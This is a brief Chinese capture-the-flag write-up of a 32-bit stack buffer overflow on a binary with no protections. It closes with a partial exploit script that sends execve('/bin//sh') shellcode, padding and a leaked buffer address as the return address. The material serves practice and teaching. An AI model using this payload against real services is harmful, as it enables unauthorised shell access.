拖进IDA
这次先是一个vulnerable_function函数,再是一个write函数
查看保护机制,发现没有开启,大佬说保护机制没开启,就可以用shellcode啦
接下来看函数内部
可以看到buf的缓冲区大小为0x100个字节,但是其偏移量是0x88个字节
在0x88个字节中首先要留出shellcode的空间(注意这里是32位的)
最终返回的地址显然也要返回到shellcode才行
因为我自己shellcode加在buf一开始的位置,那么在刚开始接收buf地址的地方截取一下address就好了
上脚本
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
cn.recvuntil("What's this:")
addr=cn.recv(10)
cn.recvline()
addr=int(addr,16)
payload=shellcode+'a'*(0x88+0x04-len(shellcode))+p32(addr)
cn.sendline(payload)
#只写了主体部分